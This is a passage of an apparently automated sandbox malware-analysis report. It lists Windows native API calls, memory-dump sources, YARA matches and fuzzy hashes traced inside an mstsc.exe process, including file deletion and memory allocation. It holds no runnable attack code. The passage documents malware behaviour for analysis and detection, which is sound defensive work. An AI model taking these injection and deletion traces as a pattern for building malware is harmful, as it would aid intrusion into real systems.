                                                                                                                      • NtReadFile.NTDLL(003479C0,00342E8B,FFFFFFFF,003474B0,00000206,?,003479C0,00000206,003474B0,FFFFFFFF,00342E8B,003479C0,00000206,00000000), ref: 0034CB75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: adc9d58e0dd8f11d357056f81d7982816f1713366143eb9f779a083cbeb95e97
                                                                                                                      • Instruction ID: d6da8d843e083fce98de97aa79f53622a43a13d01b1ba802aad05c31491e5538
                                                                                                                      • Opcode Fuzzy Hash: adc9d58e0dd8f11d357056f81d7982816f1713366143eb9f779a083cbeb95e97
                                                                                                                      • Instruction Fuzzy Hash: ACF0A4B6200208ABCB14DF99DC85EEB77EDAF8C754F158248BA1D97251D634E851CBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00010000,?,?,00000000,00000004,00001000,?), ref: 0034CC99
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: acc9ed0ca13dd7a7f53e51d537f713dde79812ba54c4f2e1ed77ef9d30ce1710
                                                                                                                      • Instruction ID: 64faafc14f0036cb3a7823ad44bd0025ee42f6c4e11b726e2054d758136131e6
                                                                                                                      • Opcode Fuzzy Hash: acc9ed0ca13dd7a7f53e51d537f713dde79812ba54c4f2e1ed77ef9d30ce1710
                                                                                                                      • Instruction Fuzzy Hash: 48F015B6200218AFCB14DF89CC81EEB77ADAF88750F018108BE0D9B241C630F810CBE0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtDeleteFile.NTDLL(003477C2,00000206,?,003477C2,00000005,00000018,?,?,00000000,00000206,00000000), ref: 0034CBA5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 59a19cd8cc2a1040b67f8ba9554361dcb75043d676cb85af1254746da32520e6
                                                                                                                      • Instruction ID: 9b48153b30184f3489ffb61da4b2ffe2e8dd283c53d2ca1c10ac4b6604ca3dd5
                                                                                                                      • Opcode Fuzzy Hash: 59a19cd8cc2a1040b67f8ba9554361dcb75043d676cb85af1254746da32520e6
                                                                                                                      • Instruction Fuzzy Hash: F3E0C2763101106BC610EFA8DC85ED77BA8EF49360F018465FA0C9F242C530B70087E0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtDeleteFile.NTDLL(003477C2,00000206,?,003477C2,00000005,00000018,?,?,00000000,00000206,00000000), ref: 0034CBA5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 98bbec273db1792cf50ec722333e7e340967ad53fecd303db2d8d4fc1482c5c6
                                                                                                                      • Instruction ID: 79373d85ae6a893305b72811999ef7144b8af8339bc7aa41426bf286a0cbd4d6
                                                                                                                      • Opcode Fuzzy Hash: 98bbec273db1792cf50ec722333e7e340967ad53fecd303db2d8d4fc1482c5c6
                                                                                                                      • Instruction Fuzzy Hash: ABD017766002146BD610EB94DE89ED77BA8DF49760F02885ABA1C6F352D631EA0087E0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(0034799E,00000206,?,0034799E,00000005,FFFFFFFF), ref: 0034CBD5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: b3bbe1ef264fe85f461dae5ec1cb67678ff29516e22758b364b77bc5288b49ba
                                                                                                                      • Instruction ID: c83e4974edb998113c778a998eb46a98f91167fe771f9302168960c9ecebbe24
                                                                                                                      • Opcode Fuzzy Hash: b3bbe1ef264fe85f461dae5ec1cb67678ff29516e22758b364b77bc5288b49ba
                                                                                                                      • Instruction Fuzzy Hash: 47D01776200214ABDB10EB98CC89ED77BACEF49660F158055BA0D5B242C930FA0087E0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtDeleteFile.NTDLL(003477C2,00000206,?,003477C2,00000005,00000018,?,?,00000000,00000206,00000000), ref: 0034CBA5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: afc71fc3fb6c2502d5645465001fd0d39861431a53cfeee62738a799e8be6224
                                                                                                                      • Instruction ID: fd2e26c345b6e09fb496f3de075bca01b1718732f4ae4e13c38f58dced37e874
                                                                                                                      • Opcode Fuzzy Hash: afc71fc3fb6c2502d5645465001fd0d39861431a53cfeee62738a799e8be6224
                                                                                                                      • Instruction Fuzzy Hash: A5D017762002146BD610EB98CC89ED77BACDF49760F018455BA1C5B242C630FA0086E0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 484b6d2a8bc140504ca738e7e31de20ee3e2c2b4438b1d0bccbfbaf3676a49b3
                                                                                                                      • Instruction ID: bae11972629ea7ed29fbee7a29ba3510fdcc22cfd03102a28393c95a7e04d457
                                                                                                                      • Opcode Fuzzy Hash: 484b6d2a8bc140504ca738e7e31de20ee3e2c2b4438b1d0bccbfbaf3676a49b3
                                                                                                                      • Instruction Fuzzy Hash: 5590023162520402FA0075584714706104987D2245F61C855A042D668DD7F5DD5175B2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 4759cf1c692756287d639c9bc4864908cdf53d7228d852fc311d2cbffe2ba44c
                                                                                                                      • Instruction ID: 8d76507c3738e3f0a52a571f3b7132f1ab78625c56d64036d80923ab0c955d7d
                                                                                                                      • Opcode Fuzzy Hash: 4759cf1c692756287d639c9bc4864908cdf53d7228d852fc311d2cbffe2ba44c
                                                                                                                      • Instruction Fuzzy Hash: 8490022923310002FA807558560860A004987D3246F91D859A001E658CD975DC696331
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c3613d190f1164a56260729e15e1a9b10b811df2ad60fb316c81d719a9e63379
                                                                                                                      • Instruction ID: 6bf3926da45f3773e218ecf4cceca06bdf79c6fa22cf08500152f15741997b16
                                                                                                                      • Opcode Fuzzy Hash: c3613d190f1164a56260729e15e1a9b10b811df2ad60fb316c81d719a9e63379
                                                                                                                      • Instruction Fuzzy Hash: E6900221262141527E45B5584604507404A97E2285791C456A141DA50CD576EC56E631
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 50773e4477b331b00c2d4a080f332022b47aae9fead841c4e57dc08fd09f899f
                                                                                                                      • Instruction ID: 6316eefe128ab86bc016dc4e9aeb45f9553420997c99a0947f026957fcc30011
                                                                                                                      • Opcode Fuzzy Hash: 50773e4477b331b00c2d4a080f332022b47aae9fead841c4e57dc08fd09f899f
                                                                                                                      • Instruction Fuzzy Hash: E590023122110413FA1175584704707004D87D2285F91C856A042D658DE6B6DD52B131
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: abd2196ef2d07d13d736fbe5f0ba73bee06c3a84e5f8dfacd55ebbf463f6a7ad
                                                                                                                      • Instruction ID: be303d8cd20d39b38f33efce5aaac5795ba579fe5f9c49732a7d082b0aedc4b1
                                                                                                                      • Opcode Fuzzy Hash: abd2196ef2d07d13d736fbe5f0ba73bee06c3a84e5f8dfacd55ebbf463f6a7ad
                                                                                                                      • Instruction Fuzzy Hash: 7C90027122110402FA4075584604746004987D2345F51C455A506D654ED6B9DDD57675
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 2f6f4c3c155a4898749703ccfb69948ad23c0494f9875188a4082f422c6c8df6
                                                                                                                      • Instruction ID: 6b7adf34d2bb22072b781454bd56668caa040c5af7329b83f05b8b7930f2c43d
                                                                                                                      • Opcode Fuzzy Hash: 2f6f4c3c155a4898749703ccfb69948ad23c0494f9875188a4082f422c6c8df6
                                                                                                                      • Instruction Fuzzy Hash: BB90026136110442FA0075584614B060049C7E3345F51C459E106D654DD679DC527136
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5be1c6e6f417d58089ffa68a642aa89e189e90669a873cf303b480156ba25f6d
                                                                                                                      • Instruction ID: 607d25b3fd82c7621c40a274fd54b741743a52f96fa9fc5bd97d3e82b36ec47a
                                                                                                                      • Opcode Fuzzy Hash: 5be1c6e6f417d58089ffa68a642aa89e189e90669a873cf303b480156ba25f6d
                                                                                                                      • Instruction Fuzzy Hash: 4890022123190042FB0079684E14B07004987D2347F51C559A015D654CD975DC616531
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: e4bb2230398c03c4148b722cdd8a1e0bfe18839d5892fe539649aecb40963b3e
                                                                                                                      • Instruction ID: a8cf41644f759e1b9781f085da0e11e4353328734948523ec165cf177c658503
                                                                                                                      • Opcode Fuzzy Hash: e4bb2230398c03c4148b722cdd8a1e0bfe18839d5892fe539649aecb40963b3e
                                                                                                                      • Instruction Fuzzy Hash: 15900225231100032A05B9580704507008A87D7395351C465F101E650CE671DC616131
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: e753e2d6b1b5ee130edeed7aa9cf9df3a5d45b79d5f3aba4d514d1549071a85a
                                                                                                                      • Instruction ID: cb20292cc5002940529f845e0fe7f70aa1a3bb3b00b792e4e2ac8b8697658f07
                                                                                                                      • Opcode Fuzzy Hash: e753e2d6b1b5ee130edeed7aa9cf9df3a5d45b79d5f3aba4d514d1549071a85a
                                                                                                                      • Instruction Fuzzy Hash: 8F900225231100022A45B958070450B048997D7395391C459F141F690CD671DC656331
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: f2cb9e0f0d43274179d479404004c6a3c64ff9e9c5d1f4118e4f40ac51a88985
                                                                                                                      • Instruction ID: 8ae7a7395cd6978344222e94b9327e5b86cd6fb35803e6b27dbda1f937c2ac7d
                                                                                                                      • Opcode Fuzzy Hash: f2cb9e0f0d43274179d479404004c6a3c64ff9e9c5d1f4118e4f40ac51a88985
                                                                                                                      • Instruction Fuzzy Hash: DB90023162510802FA5075584614746004987D2345F51C455A002D754DD7B5DE5576B1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: cc93341a10cfa4f0820425bf6eef773a73fa003325c5b526ff9d4c96f0bd893a
                                                                                                                      • Instruction ID: d4de26927d203b84909feb4a6a8037992ebe258d41dcec56b2b466cf0f917e34
                                                                                                                      • Opcode Fuzzy Hash: cc93341a10cfa4f0820425bf6eef773a73fa003325c5b526ff9d4c96f0bd893a
                                                                                                                      • Instruction Fuzzy Hash: 5E900261222100036A0575584614616404E87E2245B51C465E101D690DD575DC917135
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 2d97baa3b0a7f8d9c2ae8bffcd93a919588e89fd9c062662fb49bf6202f2fc05
                                                                                                                      • Instruction ID: 5e459f1dd4265507910e1b701251d975e073fbf12628e29342ff2991de3cfb41
                                                                                                                      • Opcode Fuzzy Hash: 2d97baa3b0a7f8d9c2ae8bffcd93a919588e89fd9c062662fb49bf6202f2fc05
                                                                                                                      • Instruction Fuzzy Hash: D890023122514842FA4075584604A46005987D2349F51C455A006D794DE675DD55B671
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 4d63b725e6aadc533428b05e880899b66ac2580e154fa2d79ab099d8054a58e1
                                                                                                                      • Instruction ID: 5d2dbac6a2fd2884afa140b18ac6c0d01daf84e3cb00d7df1635206c45b2b225
                                                                                                                      • Opcode Fuzzy Hash: 4d63b725e6aadc533428b05e880899b66ac2580e154fa2d79ab099d8054a58e1
                                                                                                                      • Instruction Fuzzy Hash: DA90023122110802FA807558460464A004987D3345F91C459A002E754DDA75DE5977B1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 285fed05897cb36430d2344a42215069cecb9358a2781d08451615330eac82e5
                                                                                                                      • Instruction ID: aa902a0d0d254f21092219f9d5b6a77ac476855c362e4d3c4bc1ec7fa06f805a
                                                                                                                      • Opcode Fuzzy Hash: 285fed05897cb36430d2344a42215069cecb9358a2781d08451615330eac82e5
                                                                                                                      • Instruction Fuzzy Hash: 2D90023122110402FA0079985608646004987E2345F51D455A502D655ED6B5DC917131
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: dbbf65d1826581471c160714bc8c1e47c93b8200bd77491b8452f6cadf7b42cd
                                                                                                                      • Instruction ID: 81355ff79b700d9074b746f6ebd43ff202e2e4c1c26488ed0dc9893d8bf9c5ac
                                                                                                                      • Opcode Fuzzy Hash: dbbf65d1826581471c160714bc8c1e47c93b8200bd77491b8452f6cadf7b42cd
                                                                                                                      • Instruction Fuzzy Hash: D390023122110842FA0075584604B46004987E2345F51C45AA012D754DD675DC517531
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 2fd09cd41a193da5d2a39533b4dedf6fbb70a505caec79d752a569fffbaee021
                                                                                                                      • Instruction ID: f5fca22719468bcacd3d429b1e4b9b4eb23e2c10e7b6eacdce841c8b0faa0263
                                                                                                                      • Opcode Fuzzy Hash: 2fd09cd41a193da5d2a39533b4dedf6fbb70a505caec79d752a569fffbaee021
                                                                                                                      • Instruction Fuzzy Hash: F690023122118802FA107558860474A004987D2345F55C855A442D758DD6F5DC917131
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 0034B89B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                      • Opcode ID: 4ae7547b01e73aa7558ac3883fdcbd7fd9c70f9ffebe0a898af84a53e3b3c916
                                                                                                                      • Instruction ID: 1ed885cb5ccb2b0f419c07d5741feceabbb4149302a73fb2411f6f77c148b68b
                                                                                                                      • Opcode Fuzzy Hash: 4ae7547b01e73aa7558ac3883fdcbd7fd9c70f9ffebe0a898af84a53e3b3c916
                                                                                                                      • Instruction Fuzzy Hash: 8F3169B5A00304ABD714DFA4D885FA7F7E8EB88700F00852EE6999B245D774B9048BA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 0034B89B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                      • Opcode ID: ea19fa6e61bf0af85fdcee62a86220b540f12f99e58291da72528d2c51457cc0
                                                                                                                      • Instruction ID: f92b054694bfbca742c0d9f4b45a4b88cbaa1bb87044674c5b1249a3c872c1f7
                                                                                                                      • Opcode Fuzzy Hash: ea19fa6e61bf0af85fdcee62a86220b540f12f99e58291da72528d2c51457cc0
